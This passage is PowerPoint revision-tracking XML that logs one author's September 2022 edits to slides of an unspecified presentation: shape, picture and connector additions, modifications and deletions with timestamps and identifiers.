          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:46:25.159" v="8733" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048451075" sldId="29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1:37.218" v="9649" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048451075" sldId="291"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del setBg">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:46:10.145" v="8714"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3489640356" sldId="291"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:09:45.120" v="10561" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="556771378" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:06:48.108" v="10186" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="556771378" sldId="292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09:45.120" v="10561" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="556771378" sldId="292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55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:04:04.103" v="9968" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2404323130" sldId="292"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:04:24.649" v="12140" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="765263298" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:16:42" v="10735" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="765263298" sldId="29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4:24.649" v="12140" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="765263298" sldId="293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3:55:49.940" v="11515" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="344686075" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:55:49.940" v="11515" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="344686075" sldId="294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3:48:34.709" v="11443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="344686075" sldId="294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3:48:36.688" v="11444" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="344686075" sldId="294"/>
            <ac:spMk id="6" creationId="{7A026FA9-BA99-690A-1DF2-AB685D396523}"/>
          </ac:spMkLst>
        </pc:sp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6" creationId="{B9D9C6D9-8E48-5BA3-6333-ECCA90BF23B4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8" creationId="{485C864B-3B34-0480-E268-397871B7F7A7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0" creationId="{3F699440-0A38-4061-A60E-00D6862413AE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2" creationId="{AE71F83B-BBB2-415E-5E78-0E95246A6312}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:02:00.687" v="12097" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="883159810" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:56:22.889" v="11534" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883159810" sldId="295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2:00.687" v="12097" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883159810" sldId="295"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:56:29.409" v="11536" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883159810" sldId="295"/>
            <ac:spMk id="14" creationId="{37FF5A66-C9BF-D01A-ADA7-CE5F407CFBBF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:56:25.326" v="11535" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883159810" sldId="295"/>
            <ac:picMk id="8" creationId="{CC965B87-D179-AE85-E110-B9B06BD8A836}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:56:30.413" v="11537" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883159810" sldId="295"/>
            <ac:cxnSpMk id="10" creationId="{C0E29E3D-9CEF-CBAB-D840-B7F3B5D372CE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:03:46.403" v="12108" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="7871898" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:02:07.783" v="12099" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="7871898" sldId="29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2:10.641" v="12100" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="7871898" sldId="296"/>
            <ac:spMk id="6" creationId="{CDB2AE1B-111A-8888-04DB-B37F0A810384}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:03:46.403" v="12108" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="7871898" sldId="296"/>
            <ac:picMk id="2050" creationId="{8E3CBB5F-6846-02A9-A395-6AC1BDA0D327}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:50:55.341" v="12870" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3876528484" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:48:52.976" v="12646" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876528484" sldId="297"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:50:51.711" v="12869" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876528484" sldId="297"/>
            <ac:spMk id="6" creationId="{E7DCA583-3175-6BC3-D22E-7F94908B7C17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:49:06.087" v="12678" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876528484" sldId="297"/>
            <ac:spMk id="8" creationId="{9BCC71D5-8D79-BB76-9D16-BE2236A80F25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:50:55.341" v="12870" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876528484" sldId="297"/>
            <ac:picMk id="5" creationId="{0052ADAD-278B-74DC-FF02-CAC9E76EFF9C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:44:53.947" v="12432" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2938953366" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:07:34.584" v="12159" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2938953366" sldId="298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21:44:53.947" v="12432" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2938953366" sldId="298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7:41.709" v="12182" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="561966559" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T14:07:53.131" v="12174" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="561966559" sldId="299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7:54.684" v="12175" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="561966559" sldId="299"/>
            <ac:spMk id="6" creationId="{6D576523-E5E9-78B2-5305-B06876790928}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:37:41.709" v="12182" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="561966559" sldId="299"/>
            <ac:picMk id="8" creationId="{D675C783-1F7C-4E00-6AE1-AA8E1595E917}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:54:58.071" v="12878" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2875989526" sldId="300"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:54:58.071" v="12878" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2875989526" sldId="300"/>
            <ac:picMk id="1026" creationId="{FCE30C57-99D9-C2D8-8544-1BA86BF0FE57}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:54:50.282" v="12877" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2875989526" sldId="300"/>
            <ac:picMk id="2050" creationId="{8E3CBB5F-6846-02A9-A395-6AC1BDA0D327}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:58:28.183" v="13160" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="126392258" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:57:14.861" v="12966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21:56:06.074" v="12883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21:58:28.183" v="13160" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="126392258" sldId="301"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd addSection delSection modSection">
      <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:56:44.899" v="7928" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:23:08.057" v="139" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952303437" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:23:08.057" v="139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03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-05T22:39:39.078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">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:29:00.766" v="549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3215868461" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:28:38.682" v="463" actId="6549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29:00.766" v="549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265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851964172" sldId="269"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:48:17.870" v="7725" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="891638217" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:48:17.870" v="7725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31576741" sldId="27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500524910" sldId="27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235906467" sldId="275"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:34:23.126" v="1061" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1260607813" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:29:15.587" v="583" actId="5793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34:23.126" v="1061" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:44:21.042" v="1388" actId="22"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3328257088" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:44:15.527" v="1386" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="27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7:43:16.102" v="1292" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="3" creationId="{AC298E28-5618-F3A3-3FA4-F85D9BECF434}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:43:28.934" v="1295" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="8" creationId="{4863EE52-3554-E225-9E49-68B0F5C4610E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:44:21.042" v="1388" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="12" creationId="{38C3C2A0-AB6F-0C90-235C-1F9D3181D0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:43:04.244" v="1291" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="21" creationId="{994A5F0B-57F8-A0E0-4BCE-5F1B090B86FA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291775708" sldId="279"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T08:30:50.175" v="3712" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1997460661" sldId="28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97835920" sldId="281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497861930" sldId="282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61461186" sldId="283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30388274" sldId="284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711768464" sldId="285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4175268356" sldId="286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620112234" sldId="28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964098297" sldId="288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93640102" sldId="289"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:27:52.221" v="428" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1539343521" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:27:52.221" v="428" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1539343521" sldId="290"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:28:11.344" v="434"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2048451075" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:27:59.808" v="429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048451075" sldId="291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28:10.957" v="433" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048451075" sldId="291"/>
            <ac:spMk id="6" creationId="{AD224E01-A57D-1F68-0299-5607D6099B9E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:28:01.228" v="431"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048451075" sldId="291"/>
            <ac:spMk id="7" creationId="{99397B88-EF80-B2F4-2D15-18A022F5EA53}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:28:11.344" v="434"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048451075" sldId="291"/>
            <ac:spMk id="8" creationId="{8235E03F-8D42-2A05-BF7D-E71A49D0B4F8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56771378" sldId="292"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:52:00.132" v="1747" actId="2711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3410643697" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:52:00.132" v="1747" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3410643697" sldId="292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33:57.177" v="1002" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3410643697" sldId="292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33:59.744" v="1003" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3410643697" sldId="292"/>
            <ac:spMk id="6" creationId="{8DA38727-D755-FD14-F6CE-7A6E87427958}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:39:23.669" v="1075" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3410643697" sldId="292"/>
            <ac:picMk id="1026" creationId="{B01957A5-4FEB-2D6E-0683-E558E1280DC6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65263298" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:49:35.219" v="1547" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2806594951" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:49:19.070" v="1477" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2806594951" sldId="293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7:49:07.195" v="1428" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2806594951" sldId="293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7:49:35.219" v="1547" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2806594951" sldId="293"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6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44686075" sldId="294"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:58:27.472" v="2238" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4157974868" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T07:52:07.414" v="1749"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4157974868" sldId="294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7:58:27.472" v="2238" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4157974868" sldId="294"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:sp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883159810" sldId="295"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modNotesTx">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T08:18:04.192" v="2972" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1657834469" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T08:13:18.546" v="2607" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1657834469" sldId="295"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
